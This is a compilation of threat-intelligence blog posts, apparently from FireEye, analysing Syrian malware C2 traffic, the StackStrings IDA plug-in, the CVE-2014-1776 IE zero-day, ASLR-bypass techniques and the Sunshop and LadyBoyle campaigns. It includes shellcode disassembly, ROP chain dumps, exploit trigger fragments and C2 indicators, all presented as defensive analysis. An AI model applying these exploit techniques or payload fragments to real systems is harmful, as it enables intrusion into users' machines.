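Splitting on the full /j|n\ token rather than any single character is what makes fields containing spaces or backslash-heavy paths (as in the later sample's traffic) survive intact.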

Additional pivoting off of svchost.exe brought us to three additional samples apparently built with BlackWorm Dark Edition. One binary that drew our attention, E.exe (MD5: a8cf815c3800202d448d035300985dc7), looked to be a backdoor with the Syrian Malware strings within it.


When executed, the binary beacons to on port 1177. This C2 has been seen in multiple malware runs often associated with Syria.  The command structure of the binary is:

!0/j|n\Syrian Malware/j|n\{Hostname}/j|n\{Username}/j|n\USA/j|n\Win 7 Professional SP1 x86/j|n\No/j|n


Finally, pivoting to another sample, 1gpj.srcRania (MD5: f99c15c62a5d981ffac5fdb611e13095), we found the same strings present. The string “Rania,” used as a lure, was in Arabic and likely refers to the prolific Queen Rania of Jordan.


The traffic is nearly identical to the other samples we identified and tied to the Syrian Malware Team.

!1/j|n\C:\Documents and Settings\{Username}\Local Settings\Application DataldoDrZdpkK.jpg - Windows Internet Explorer[endof]!0/j|n\Syrian Malware/j|n\{Hostname}/j|n\{Username}/j|n\USA/j|n\Win XP ProfessionalSP2 x86/j|n\No/j|n\0.1/j|n\/j|n\C:\Documents and Settings\{Username}\Local Settings\Application DataldoDrZdpkK.jpg - {ActiveWindowName}/j|n\[endof]


Determining which groups use which malware is often very difficult. Connecting the dots between actors and malware typically involves looking at binary code, identifying related malware examples associated with those binaries, and reviewing infection vectors, among other things.

This blog presents a prime example of the process of attribution. We connected a builder with malware samples and the actors/developers behind these attacks. This type of attribution is key to creating actionable threat intelligence to help proactively protect organizations.

FLARE IDA Pro Script Series: Automatic Recovery of Constructed Strings in Malware

The FireEye Labs Advanced Reverse Engineering (FLARE) Team is dedicated to sharing knowledge and tools with the community. We started with the release of the FLARE On Challenge in early July where thousands of reverse engineers and security enthusiasts participated. Stay tuned for a write-up of the challenge solutions in an upcoming blog post.

This post is the start of a series where we look to aid other malware analysts in the field. Since IDA Pro is the most popular tool used by malware analysts, we’ll focus on releasing scripts and plug-ins to help make it an even more effective tool for fighting evil. In the past, at Mandiant, we released scripts on GitHub, and we’ll continue to do so at the following new location. This is where you will also find the plug-ins we released in the past: Shellcode Hashes and Struct Typer. We hope you find all these scripts as useful as we do.

Quick Challenge

Let’s start with a simple challenge. What two strings are printed when executing the disassembly shown in Figure 1?


Figure 1: Disassembly challenge

If you answered “Hello world\n” and “Hello there\n”, good job! If you didn’t see it then Figure 2 makes this more obvious. The bytes that make up the strings have been converted to characters and the local variables are converted to arrays to show buffer offsets.

Figure 2: Disassembly challenge with markup

Reverse engineers are likely more accustomed to strings that are a consecutive sequence of human-readable characters in the file, as shown in Figure 3. IDA generally does a good job of cross-referencing these strings in code as can be seen in Figure 4.

Figure 3: A simple string

Figure 4: Using a simple string

Manually constructed strings like in Figure 1 are often seen in malware. The bytes that make up the strings are stored within the actual instructions rather than a traditional consecutive sequence of bytes. Simple static analysis with tools such as strings cannot detect these strings. The code in Figure 5, used to create the challenge disassembly, shows how easy it is for a malware author to use this technique.

Figure 5: Challenge source code

Automating the recovery of these strings during malware analysis is simple if the compiler follows a basic pattern. A quick examination of the disassembly in Figure 1 could lead you to write a script that searches for mov instructions that begin with the opcodes C6 45 and then extracts the stack offset and character bytes. Modern compilers with optimizations enabled often complicate matters, as they may:

  • Load frequently used characters in registers which are used to copy bytes into the buffer
  • Reuse a buffer for multiple strings
  • Construct the string out of order
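Before considering those optimizations, the naive pattern scan suggested above can be sketched in a few lines. This is a simplified illustration of the C6 45 approach (mov byte ptr [ebp+disp8], imm8), not the released plug-in:

```python
def recover_stack_strings(code: bytes):
    """Naive scan for `mov byte ptr [ebp+disp8], imm8` (opcodes C6 45 disp8 imm8)."""
    writes = {}
    i = 0
    while i + 3 < len(code):
        if code[i] == 0xC6 and code[i + 1] == 0x45:
            disp = code[i + 2]
            if disp >= 0x80:          # disp8 is signed; sign-extend it
                disp -= 0x100
            writes[disp] = code[i + 3]
            i += 4
        else:
            i += 1
    # Group writes at consecutive stack offsets into candidate strings.
    strings, run, prev = [], [], None
    for off in sorted(writes):
        if run and off != prev + 1:
            strings.append(bytes(run))
            run = []
        run.append(writes[off])
        prev = off
    if run:
        strings.append(bytes(run))
    return [s.rstrip(b"\x00").decode("latin-1") for s in strings if len(s) > 1]

# mov [ebp-0Ch],'H'; mov [ebp-0Bh],'i'; mov [ebp-0Ah],0 -> builds "Hi\0"
code = bytes.fromhex("c645f448c645f569c645f600")
print(recover_stack_strings(code))  # ['Hi']
```

Note how this approach immediately breaks against the optimized code in Figure 6: register-based writes use different opcodes, and a reused buffer would merge two strings into one, which is exactly why the plug-in emulates memory writes instead of pattern-matching opcodes.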

Figure 6 shows the disassembly of the same source code that was compiled with optimizations enabled. This caused the compiler to load some of the frequently occurring characters in registers to reduce the size of the resulting assembly. Extra instructions are required to load the registers with a value like the 2-byte mov instruction at 0040115A, but using these registers requires only a 4-byte mov instruction like at 0040117D. The mov instructions that contain hard-coded byte values are 5-bytes, such as at 0040118F.

Figure 6: Compiler optimizations

The StackStrings IDA Pro Plug-in

To help you defeat malware that contains these manually constructed strings, we’re releasing an IDA Pro plug-in named StackStrings. The plug-in relies heavily on analysis by a Python library called Vivisect, a binary analysis framework we frequently use to augment our analysis. StackStrings uses Vivisect’s analysis and emulation capabilities to track simple memory usage by the malware. The plug-in identifies memory writes to consecutive memory addresses of likely string data, then prints the strings and their locations and creates comments where each string is constructed. Figure 7 shows the result of running the above program with the plug-in.

Figure 7: StackStrings plug-in results
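The aggregation idea can be illustrated with a toy model: given a trace of (address, byte) writes observed during emulation, group writes to consecutive addresses and keep the printable runs. This is a deliberate simplification of what StackStrings does on top of Vivisect, not its actual code:

```python
import string

PRINTABLE = set(string.printable.encode())

def extract_strings(writes, min_len=4):
    """writes: iterable of (address, byte_value) pairs recorded during emulation."""
    mem = dict(writes)                 # last write to each address wins
    results, run, prev = [], [], None
    for addr in sorted(mem):
        b = mem[addr]
        if b in PRINTABLE and (not run or addr == prev + 1):
            run.append(b)              # extend the current consecutive run
        else:
            if len(run) >= min_len:
                results.append(bytes(run).decode())
            run = [b] if b in PRINTABLE else []
        prev = addr
    if len(run) >= min_len:
        results.append(bytes(run).decode())
    return results

# Simulated trace of byte-at-a-time writes building a string on the stack.
writes = [(0x1000 + i, c) for i, c in enumerate(b"Hello world\n")]
writes.append((0x2000, 0x41))          # isolated write: too short to report
print(extract_strings(writes))
```

Because the model keys on addresses rather than instruction patterns, it naturally handles out-of-order construction and register-sourced writes, the two cases that defeat the naive opcode scan.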

While the plug-in is called StackStrings, its analysis is not just limited to the stack. It also tracks all memory segments accessed during Vivisect’s analysis, so manually constructed strings in global data are identified as well as shown in Figure 8.

Figure 8: Sample global string

Simple, manually constructed WCHAR strings are also identified by the plug-in as shown in Figure 9.

Figure 9: Sample WCHAR data


Download Vivisect and add the package to your PYTHONPATH environment variable if you don’t already have it installed.

Clone the git repository. The script in the python\ directory is the IDA Python script that contains the plug-in logic; it can either be copied to your %IDADIR%\python directory or placed in any directory found in your PYTHONPATH. The file in the plugins\ directory must be copied to the %IDADIR%\plugins directory.

Test the installation by running the following Python commands within IDA Pro and ensure no error messages are produced:


To run the plug-in in IDA Pro, go to Edit – Plugins – StackStrings, or press Alt+0.

Known Limitations

The compiler may aggressively optimize memory and register usage when constructing strings. The worst-case scenario for recovering these strings occurs when a memory buffer is reused multiple times within a function and string construction spans multiple basic blocks. Figure 10 shows the construction of “Hello world\n” and “Hello there\n”. The plug-in attempts to deal with this by prompting you to choose between a basic-block aggregator and a function aggregator. Often the basic-block level of memory aggregation is fine, but in situations like this, running the plug-in both ways provides additional results.

Figure 10: Two strings, one buffer, multiple basic blocks

You’ll likely get some false positives due to how Vivisect initializes some data for its emulation. False positives should be obvious when reviewing results, as seen in Figure 11.

Figure 11: False positive due to memory initialization

The plug-in aggressively checks for strings during aggregation steps, so you’ll likely get some false positives if the compiler sets null bytes in a stack buffer before the complete string is constructed.

The plug-in currently loads a separate Vivisect workspace for the same executable loaded in IDA. If you’ve manually loaded additional memory segments within your IDB file, Vivisect won’t be aware of that and won’t process those.

Vivisect’s analysis does not always exactly match that of IDA Pro, and differences in the way the stack pointer is tracked between the two programs may affect the reconstruction of stack strings.

If the malware is storing a binary string that is later decoded, even with a simple XOR mask, this plug-in likely won’t work.

The plug-in was originally written to analyze 32-bit x86 samples. It has worked on test 64-bit samples, but it hasn’t been extensively tested for that architecture.


StackStrings is just one of many internally developed tools we use on the FLARE team to speed up our analysis. We hope it will help speed up your analysis too. Stay tuned for our next post where we’ll release another tool to improve your malware analysis workflow.

New Zero-Day Exploit targeting Internet Explorer Versions 9 through 11 Identified in Targeted Attacks


FireEye Research Labs identified a new Internet Explorer (IE) zero-day exploit used in targeted attacks. The vulnerability affects IE6 through IE11, but the attack is targeting IE9 through IE11. This zero-day bypasses both ASLR and DEP. Microsoft has assigned CVE-2014-1776 to the vulnerability and released a security advisory to track this issue.

Threat actors are actively using this exploit in an ongoing campaign which we have named “Operation Clandestine Fox.” However, for many reasons, we will not provide campaign details. We believe this is a significant zero-day, as the vulnerable versions represent about a quarter of the total browser market. We recommend applying a patch once available.

According to NetMarket Share, the market share for the targeted versions of IE in 2013 were:

IE 9      13.9%

IE 10    11.04%

IE 11     1.32%

Collectively, in 2013, the vulnerable versions of IE accounted for 26.25% of the browser market. The vulnerability, however, does appear in IE6 through IE11, though the exploit targets IE9 and higher.


The Details


The exploit leverages a previously unknown use-after-free vulnerability, and uses a well-known Flash exploitation technique to achieve arbitrary memory access and bypass Windows’ ASLR and DEP protections.





• Preparing the heap


The exploit page loads a Flash SWF file to manipulate the heap layout with the common “heap feng shui” technique. It allocates Flash vector objects to spray memory and cover address 0x18184000. Next, it allocates a vector object that contains a flash.Media.Sound() object, which it later corrupts to pivot control to its ROP chain.


• Arbitrary memory access


The SWF file calls back into JavaScript in IE to trigger the IE bug and overwrite the length field of a Flash vector object in the heap spray. The SWF file then loops through the heap spray to find the corrupted vector object, and uses it to modify the length of a second vector object. This second corrupted vector object is used for all subsequent memory accesses, which bypass ASLR and DEP.
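The scan step can be illustrated with a toy model (the spray count and corrupted index here are invented for illustration; the length values 0x3FE and 0x3FFFFFF0 mirror those seen later in the shellcode's repair step):

```python
# Toy model of the heap-spray scan: spray many fixed-length "vectors",
# let the bug corrupt one length field, then loop to find the odd one out.
SPRAY_COUNT, ORIG_LEN = 1000, 0x3FE
lengths = [ORIG_LEN] * SPRAY_COUNT

lengths[617] = 0x3FFFFFF0  # the IE bug's out-of-bounds length overwrite

# The SWF's loop: the first vector whose length no longer matches is the
# corrupted one, now usable for out-of-bounds reads and writes.
corrupted_index = next(i for i, n in enumerate(lengths) if n != ORIG_LEN)
```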


• Runtime ROP generation


With full memory control, the exploit searches NTDLL for ZwProtectVirtualMemory and a stack pivot (opcodes 0x94 0xc3, i.e., xchg eax, esp; ret). It also searches for SetThreadContext in kernel32, which is used to clear the debug registers. This technique may be an attempt to bypass protections that use hardware breakpoints, such as EMET's EAF mitigation.

With the addresses of the aforementioned APIs and gadget, the SWF file constructs a ROP chain and prepends it to its RC4-decrypted shellcode. It then replaces the vftable of a sound object with a fake one that points to the newly created ROP payload. When the sound object attempts to call into its vftable, it instead pivots control to the attacker's ROP chain.


• ROP and Shellcode


The ROP payload makes memory at 0x18184000 executable and returns to 0x1818411c to execute the shellcode.


0:008> dds eax


18184100 770b5f58 ntdll!ZwProtectVirtualMemory

18184104 1818411c

18184108 ffffffff

1818410c 181840e8

18184110 181840ec

18184114 00000040

18184118 181840e4


The shellcode first saves the current stack pointer to 0x18181800 so that it can later safely return to the caller.


mov     dword ptr ds:[18181800h],ebp


Then, it restores the flash.Media.Sound vftable and repairs the corrupted vector object to avoid application crashes.


18184123 b820609f06      mov     eax,69F6020h


18184128 90 nop

18184129 90 nop

1818412a c700c0f22169 mov dword ptr [eax],offset Flash32_11_7_700_261!AdobeCPGetAPI+0x42ac00 (6921f2c0)

18184133 b800401818 mov eax,18184000h

18184138 90 nop

18184139 90 nop

1818413a c700fe030000 mov dword ptr [eax],3FEh ds:0023:18184000=3ffffff0


The shellcode also recovers the ESP register to make sure the stack range is in the current thread stack base/limit.


18184140 8be5            mov     esp,ebp


18184142 83ec2c sub esp,2Ch

18184145 90 nop

18184146 eb2c jmp 18184174


The shellcode calls SetThreadContext to clear the debug registers. It is possible that this is an attempt to bypass mitigations that use the debug registers.


18184174 57              push    edi


18184175 81ece0050000 sub esp,5E0h

1818417b c7042410000100 mov dword ptr [esp],10010h

18184182 8d7c2404 lea edi,[esp+4]

18184186 b9dc050000 mov ecx,5DCh

1818418b 33c0 xor eax,eax

1818418d f3aa rep stos byte ptr es:[edi]

1818418f 54 push esp

18184190 6afe push 0FFFFFFFEh

18184192 b8b308b476 mov eax,offset kernel32!SetThreadContext (76b408b3)

18184197 ffd0 call eax


The shellcode calls URLDownloadToCacheFileA to download the next stage of the payload, disguised as an image.




Using EMET may break the exploit in your environment and prevent it from successfully controlling your computer. EMET versions 4.1 and 5.0 break (and/or detect) the exploit in our tests.

Enhanced Protected Mode in IE breaks the exploit in our tests. EPM was introduced in IE10.

Additionally, the attack will not work without Adobe Flash. Disabling the Flash plugin within IE will prevent the exploit from functioning.


Threat Group History


The APT group responsible for this exploit has been the first group to have access to a select number of browser-based zero-day exploits (e.g., IE, Firefox, and Flash) in the past. They are extremely proficient at lateral movement and are difficult to track, as they typically do not reuse command and control infrastructure. They have a number of backdoors, including one known as Pirpi that we previously discussed here. CVE-2010-3962, then a zero-day exploit in Internet Explorer 6, 7, and 8, dropped the Pirpi payload discussed in that previous case.

As this is still an active investigation we are not releasing further indicators about the exploit at this time.

Acknowledgement: We thank Christopher Glyer, Matt Fowler, Josh Homan, Ned Moran, Nart Villeneuve and Yichong Lin for their support, research, and analysis on these findings.

ASLR Bypass Apocalypse in Recent Zero-Day Exploits

ASLR (Address Space Layout Randomization) is one of the most effective protection mechanisms in modern operating systems. But it's not perfect. Many recent APT attacks have used innovative techniques to bypass ASLR.

Here are just a few interesting bypass techniques that we have tracked in the past year:

  • Using non-ASLR modules
  • Modifying the BSTR length/null terminator
  • Modifying the Array object

The following sections explain each of these techniques in detail.

Non-ASLR modules

Loading a non-ASLR module is the easiest and most popular way to defeat ASLR protection. Two popular non-ASLR modules are used in IE zero-day exploits: MSVCR71.DLL and HXDS.DLL.

MSVCR71.DLL, shipped with JRE 1.6.x, is an old version of the Microsoft Visual C Runtime Library that was not compiled with the /DYNAMICBASE option. By default, this DLL is loaded into the IE process at a fixed location in the following OS and IE combinations:

  • Windows 7 and Internet Explorer 8
  • Windows 7 and Internet Explorer 9

HXDS.DLL, shipped with MS Office 2007/2010, is not compiled with /DYNAMICBASE. This technique is now the most frequently used ASLR bypass for IE 8/9 on Windows 7. The DLL is loaded when the browser loads a page with 'ms-help://' in the URL.
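Whether a given module opted into ASLR can be verified by checking the DllCharacteristics field of its PE optional header for the IMAGE_DLLCHARACTERISTICS_DYNAMIC_BASE flag (the bit /DYNAMICBASE sets). A minimal sketch, with offsets taken from the PE/COFF layout:

```python
import struct

IMAGE_DLLCHARACTERISTICS_DYNAMIC_BASE = 0x0040

def has_aslr(data: bytes) -> bool:
    """Return True if a PE image was linked with /DYNAMICBASE.

    e_lfanew sits at file offset 0x3C; the optional header begins
    0x18 bytes past the PE signature; DllCharacteristics lives at
    offset 0x46 within the optional header (PE32 and PE32+ alike).
    """
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    dll_chars = struct.unpack_from("<H", data, e_lfanew + 0x18 + 0x46)[0]
    return bool(dll_chars & IMAGE_DLLCHARACTERISTICS_DYNAMIC_BASE)
```

Running such a check against MSVCR71.DLL or HXDS.DLL would show the flag unset, which is exactly why they make useful ROP sources.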

The following zero-day exploits used at least one of these techniques to bypass ASLR: CVE-2013-3893, CVE-2013-1347, CVE-2012-4969, CVE-2012-4792.


The non-ASLR module technique requires that IE 8 or IE 9 run alongside old software such as JRE 1.6 or Office 2007/2010. Upgrading to the latest versions of Java/Office prevents this type of attack.

Modify the BSTR length/null terminator

This technique first appeared in Peter Vreugdenhil's 2010 Pwn2Own IE 8 exploit. It applies only to specific types of vulnerabilities that can overwrite memory, such as buffer overflows, arbitrary memory writes, and bugs that increase or decrease the content of a memory pointer.

An arbitrary memory write does not directly control EIP. Most of the time, such an exploit overwrites important program data, such as function pointers, to execute code. For attackers, the good thing about these vulnerabilities is that they can corrupt the length of a BSTR so that using the BSTR accesses memory outside its original boundaries. Such accesses may disclose memory addresses that can be used to pinpoint libraries suitable for ROP. Once the exploit has bypassed ASLR in this way, it can use the same memory corruption bug to control EIP.

Few vulnerabilities can be used to modify the BSTR length directly. For example, some vulnerabilities can only increase or decrease a memory pointer by one or two bytes. In that case, the attacker can modify the null terminator of a BSTR to concatenate the string with the next object. Subsequent accesses to the modified BSTR then include the concatenated object's content as part of the BSTR, where attackers can usually find information related to DLL base addresses.
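A toy model of the length-corruption idea (all addresses and values here are invented for illustration; real BSTRs are length-prefixed UTF-16 buffers on the OLE heap):

```python
import struct

# Toy heap: a length-prefixed "BSTR" sits next to an object whose first
# dword is a vftable pointer into a loaded module.
heap = bytearray()
chars = "AAAA".encode("utf-16-le")
heap += struct.pack("<I", len(chars)) + chars + b"\x00\x00"  # length + data + null

VFTABLE_PTR = 0x6921F2C0                 # hypothetical module address to leak
heap += struct.pack("<I", VFTABLE_PTR)   # adjacent object

# The memory-corruption bug overwrites only the 4-byte length field...
struct.pack_into("<I", heap, 0, 0x100)

# ...so reading the "string" now runs past its original bounds and
# discloses the neighbor's vftable pointer, defeating ASLR.
oob = bytes(heap[4:4 + 0x100])
leaked = struct.unpack_from("<I", oob, len(chars) + 2)[0]
```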


The Adobe XFA zero-day exploit uses this technique to find the AcroForm.api base address and builds a ROP chain dynamically to bypass ASLR and DEP. With this vulnerability, the exploit can decrease a controllable memory pointer before calling the function pointer from its vftable:


Consider the following memory layout before the DEC operation:

[string][null][non-null data][object]

After the DEC operation (in my tests, it is decreased twice) the memory becomes:

[string][\xfe][non-null data][object]

For further details, refer to the technique write-up on Immunity's blog.


This technique usually requires multiple writes to leak the necessary information, and the exploit writer has to carefully craft the heap layout to ensure that the length field is corrupted instead of other objects in memory. Since IE 9, Microsoft has used Nozzle to prevent heap spraying/feng shui, so sometimes the attacker must use the VBArray technique to craft the heap layout.

Modify the Array object

The Array object length modification is similar to the BSTR length modification: both require a certain class of "user-friendly" vulnerabilities. Even better, from the attacker's point of view, is that once the length changes, the attacker can arbitrarily read from or write to memory, essentially taking control of the whole process flow and achieving code execution.

Here is the list of known zero-day exploits using this technique:


The first such exploit involves a buffer overflow in Adobe Flash Player's regular expression handling. The attacker overwrites the length of a Vector.<Number> object, and then reads more memory content to get the base address of flash.ocx.

Here’s how the exploit works:

  1. Set up a contiguous memory layout by allocating the following objects:
  2. Free the <Number> object at index 1 of the above objects as follows:

    obj[1] = null;
  3. Allocate the new RegExp object. This allocation reuses memory in the obj[1] position as follows:

    boom = "(?i)()()(?-i)||||||||||||||||||||||||";
    var trigger = new RegExp(boom, "");

Later, the malformed expression overwrites the length of a Vector.<Number> object in obj[2] to enlarge it. With the corrupted size, the attacker can use obj[2] to read from or write to a huge region of memory, locate the flash.ocx base address, and overwrite a vftable to execute the payload.


This vulnerability involves an IE CBlockContainerBlock object use-after-free error. The exploit is similar to CVE-2013-0634, but more sophisticated.

Basically, this vulnerability modifies arbitrary memory content using an OR instruction, something like the following:

or dword ptr [esi+8],20000h

Here’s how it works:

  1. First, the attacker sprays the target heap memory with Vector.<uint> objects as follows:
  2. After the spray, those objects are stored aligned at stable memory addresses. For example:

    The first dword, 0x03f0, is the length of the Vector.<uint> object, and the highlighted values correspond to the values in the above spray code.

  3. If the attacker points esi + 8 at the 0x03f0 length field, the size becomes 0x0203f0 after the OR operation, which is much larger than the original size.
  4. With the larger access range, the attacker can change the next object's length to 0x3FFFFFF0.
  5. From there, the attacker can access the whole memory space of the IE process. ASLR is useless because the attacker can retrieve the entire DLL images for kernel32/NTDLL directly from memory. By dynamically searching for stack pivot gadgets in the text section and locating the ZwProtectVirtualMemory native API address from the IAT, the attacker can construct a ROP chain to change the memory attributes and bypass DEP as follows:

By crafting the memory layout, the attacker also allocates a Vector.<object> that contains a flash.Media.Sound() object. The attacker uses the corrupted Vector.<uint> object to find the sound object in memory and overwrite its vftable to point to the ROP payload and shellcode.
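The length arithmetic in steps 3 and 4 above is easy to verify with a short sketch:

```python
# Step 3: the "or dword ptr [esi+8],20000h" write lands on a sprayed
# Vector.<uint> length field holding 0x03F0.
new_len = 0x03F0 | 0x20000    # far beyond the vector's real size

# Step 4: the enlarged vector is then used to rewrite a neighbor's
# length field, granting near-arbitrary memory access.
neighbor_len = 0x3FFFFFF0
```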


The use-after-free vulnerability in Firefox's DocumentViewerImpl object allows the attacker to write the word value 0x0001 into an arbitrary memory location as follows:


In the above code, all the variables that start with "m" are read from a user-controlled object. If the attacker can set the object to meet the condition in the second "if" statement, the code path is forced into the setImageAnimationMode() call, where the memory write is triggered. Inside setImageAnimationMode(), the code looks like the following:


In this exploit, the attacker uses ArrayBuffer to craft the heap layout. In the following code, each ArrayBuffer element in var2 has an original size of 0xff004.


After triggering the vulnerability, the attacker increases the size of the array to 0x010ff004. The attacker can locate this ArrayBuffer by comparing byteLength values in JavaScript, and can then read from or write to memory with the corrupted ArrayBuffer. In this case, the attacker chose to disclose the NTDLL base address from SharedUserData (0x7ffe0300), and manually hardcoded the offsets to construct the ROP payload.
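The jump from 0xff004 to 0x010ff004 is consistent with the 16-bit write of 0x0001 landing three bytes into the little-endian length dword (that offset is my inference; the write-up does not state it). A sketch:

```python
import struct

# Simulated length field (0x000FF004) followed by adjacent memory.
buf = bytearray(struct.pack("<I", 0x000FF004) + b"\x00" * 4)

# The Firefox bug writes the word 0x0001 at an attacker-chosen address;
# placed 3 bytes into the dword, its second byte spills past the field,
# turning 0x000FF004 into 0x010FF004.
struct.pack_into("<H", buf, 3, 0x0001)
corrupted_size = struct.unpack_from("<I", buf, 0)[0]
```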


This vulnerability involves a Java CMM integer overflow that allows overwriting an array length field in memory. During exploitation, the array length expands to 0x7fffffff, and the attacker can search for the securityManager object in memory and null it to break the sandbox. This technique is much more effective than overwriting function pointers and dealing with ASLR/DEP to get native code execution.

The Array object modification technique is much better than the other techniques. With the Flash ActionScript vector variant, there are no heap spray mitigations at all; as long as you have a memory-write vulnerability, it is easily implemented.


The following table outlines recent APT zero-day exploits and what bypass techniques they used:



ASLR bypasses have become more and more common in zero-day attacks. We have seen previous IE zero-day exploits use a non-ASLR Microsoft Office DLL to bypass it, and Microsoft has added mitigations to its latest OS and browser to prevent the use of non-ASLR modules. Because the old technique no longer works and is easily detected, cybercriminals will have to use more advanced exploit techniques. For vulnerabilities that allow writing memory, combining Vector.<uint> and Vector.<object> is more reliable and flexible: with one shot, the exploit can be extended from writing a single byte to reading or writing gigabytes, and it works on the latest OS and browser regardless of application or language version.

Many researchers have published work on ASLR bypasses, such as Dion Blazakis's JIT spray and Yuyang's LdrHotPatchRoutine technique. But so far we haven't seen any zero-day exploit leveraging them in the wild. The reason may be that these techniques are generic approaches to defeating ASLR, and generic approaches are usually fixed quickly after going public.

But there is no generic way to fix vulnerability-specific issues. In the future, expect more and more zero-day exploits using similar or more advanced techniques. We may need new mitigations in our OSs and security products to defeat them.

Thanks again to Dan Caselden and Yichong Lin for their help with this analysis.

Ready for Summer: The Sunshop Campaign

FireEye recently identified another targeted attack campaign that leveraged both the recently announced Internet Explorer zero-day, CVE-2013-1347, and the recently patched Java exploits CVE-2013-2423 and CVE-2013-1493. This campaign appears to have affected a number of victims, based on the use of the Internet Explorer zero-day as well as the amount of traffic observed making requests to the exploit server. This attack was likely executed by an actor we have named the 'Sunshop Group'. This actor was also responsible for the 2010 compromise of the Nobel Peace Prize website, which leveraged a zero-day in Mozilla Firefox.

Impacted Sites

The campaign in question compromised a number of strategic websites including:

• Multiple Korean military and strategy think tanks

• A Uyghur news and discussion forum

• A science and technology policy journal

• A website for evangelical students

A call to a malicious JavaScript file hosted at www[.]sunshop[.]com[.]tw was inserted into all of these compromised websites.

The Exploit Server

If a visitor to one of these compromised websites was running Internet Explorer 8.0, the malicious JavaScript would redirect them to a page at www[.]sunshop[.]com[.]tw hosting a CVE-2013-1347 exploit. All other victims were redirected to a page that downloaded two malicious jars.

if(browser=="Microsoft Internet Explorer" && trim_Version=="MSIE8.0" && window.navigator.userLanguage.indexOf("en")>-1)

Dropped Payloads and C&C Infrastructure

The Internet Explorer (CVE-2013-1347) exploit code pulled down a “9002” RAT from another compromised site at hk[.]sz181[.]com. This payload had an MD5 of b0ef2ab86f160aa416184c09df8388fe and connected to a command and control server at dns[.]homesvr[.]tk.

The Java exploits were packaged as two different jar files. One jar file had an MD5 of f4bee1e845137531f18c226d118e06d7 and exploited CVE-2013-2423. The second jar file had an MD5 of 3fbb7321d8610c6e2d990bb25ce34bec and exploited CVE-2013-1493.

The jar that exploited CVE-2013-2423 dropped a 9002 RAT with an MD5 of d99ed31af1e0ad6fb5bf0f116063e91f. This RAT connected to a command and control server at asp[.]homesvr[.]linkpc[.]net. The jar that exploited CVE-2013-1493 dropped a 9002 RAT with an MD5 of 42bd5e7e8f74c15873ff0f4a9ce974cd. This RAT connected to a command and control server at ssl[.]homesvr[.]tk.

All of the above 9002 command and control domains resolved to the same IP address. We previously discussed the extensive use of this RAT in other advanced persistent threat (APT) campaigns here.

Related Infrastructure

After further research with our friends at Mandiant, we uncovered a Briba sample with the MD5 6fe0f6e68cd9cc6ed7e100e7b3626665 that connected to this IP address. As seen in this malwr report, the command and control domain nameserver1[.]zapto[.]org resolved to the same IP address on 2013-05-07. This Briba sample generated the following network traffic to nameserver1[.]zapto[.]org over port 443:

POST /index000001021.asp HTTP/1.1

Accept-Language: en-us

User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1;)


Connection: Keep-Alive

Content-Type: text/html

Content-Length: 000041

For a detailed analysis of Briba please see Seth Hardy’s paper ‘IExplore RAT’.

The exploit site at sunshop[.]com[.]tw previously hosted a different malicious jar file on April 2, 2013. This jar file had an MD5 of 51aff823274e9d12b1a9a4bbbaf8ce00. It exploited CVE-2013-1493 and dropped a Poison Ivy RAT with the MD5 2B6605B89EAD179710565D1C2B614665. This Poison Ivy RAT connected to a command and control server at 9ijhh45[.]zapto[.]org over port 443, using the password 'ult4life'. The domain resolved to the same IP between April 2 and 8.


The Sunshop Group has used the same tactics described above in previous targeted attack campaigns, including the use of zero-day exploits, strategic web compromises, and Briba malware.

One of the more prominent attacks launched by this group was the compromise of the Nobel Peace Prize Committee's website in 2010. This attack leveraged a zero-day exploit targeting a previously unknown vulnerability in Mozilla Firefox.

Another publicly documented attack exploited a Flash zero-day and can be found here. Mila at the Contagio Blog posted additional information on this attack here. This attack dropped the same Briba payload discussed above.

FireEye detects the Briba backdoor as Backdoor.APT.IndexASP and the 9002 payloads as Trojan.APT.9002.


CVE             Exploit hash                        Payload hash                        Malware family   C&C Host
CVE-2013-1347   fb24c49299b197e1b56a1a51430aea26    b0ef2ab86f160aa416184c09df8388fe    9002             dns[.]homesvr[.]tk
CVE-2013-2423   f4bee1e845137531f18c226d118e06d7    d99ed31af1e0ad6fb5bf0f116063e91f    9002             asp[.]homesvr[.]linkpc[.]net
CVE-2013-1493   3fbb7321d8610c6e2d990bb25ce34bec    42bd5e7e8f74c15873ff0f4a9ce974cd    9002             ssl[.]homesvr[.]tk
Unknown         Unknown                             6fe0f6e68cd9cc6ed7e100e7b3626665    Briba            nameserver1[.]zapto[.]org
CVE-2013-1493   51aff823274e9d12b1a9a4bbbaf8ce00    2B6605B89EAD179710565D1C2B614665    Poison Ivy       9ijhh45[.]zapto[.]org

LadyBoyle Comes to Town with a New Exploit

[Update: February 12, 2013] By now you have probably heard of the new zero-day exploit in Adobe Flash that was patched today. FireEye Labs identified the exploit in the wild on February 5, 2013, which, based on the compile time and document creation time, is the same day the malicious payload was generated. Adobe PSIRT has released information about this threat here. They have also released an advisory with details on the versions and platforms affected, along with applicable patches. The two exploits have been assigned CVE-2013-0633 and CVE-2013-0634. We highly recommend applying this patch right away, as the threat is active in the wild.

We will examine the payload executed as part of this threat in the wild. We have identified two unique Word files containing CVE-2013-0634 so far. It is interesting to note that even though the contents of the Word files are in English, their codepage is "Windows Simplified Chinese (PRC, Singapore)". The Word files contain a macro that loads an embedded SWF Flash object.

The SWF file contains an ActionScript named "LadyBoyle" that holds the exploit code. The exploit only supports limited versions of Flash, as evident in the ActionScript seen in Figure 1. It also checks for the presence of an ActiveX component.


Figure 1

It drops multiple EXE files and a DLL payload. The payload that is dropped and executed when the exploit succeeds is also embedded in the SWF file in an SWFTag (Figure 2). The payload is 64-bit and was compiled recently, on February 4, 2013. The malware family is not new, though; we have seen it used in attacks before.


Figure 2

One of the dropped executable files is digitally signed with an invalid certificate from MGAME Corporation, a Korean gaming company. The same executable renames itself to try to pass itself off as the Google update process.


Figure 3

It creates startup registry entries for persistence across reboots. The malware checks for the presence of the AV processes listed below:





It also creates a configuration file under %appdata%\config.sys. This configuration file is XOR-encoded with the key 0xCF. The decrypted configuration file is shown in Figure 4. It contains the C2 domain contacted by the malware.
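Single-byte XOR is trivial to reverse, since the operation is its own inverse; a minimal decoder sketch (the sample blob below is invented for illustration):

```python
def xor_decode(data: bytes, key: int) -> bytes:
    """Single-byte XOR codec; key 0xCF for this malware's config file."""
    return bytes(b ^ key for b in data)

# Encoding and decoding are the same operation, so applying the key
# twice round-trips the data.
blob = xor_decode(b"example-c2-domain", 0xCF)   # illustrative plaintext
recovered = xor_decode(blob, 0xCF)
```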


It has a unique callback with the keyword “9002” and beacons to the CnC server at


Figure 5

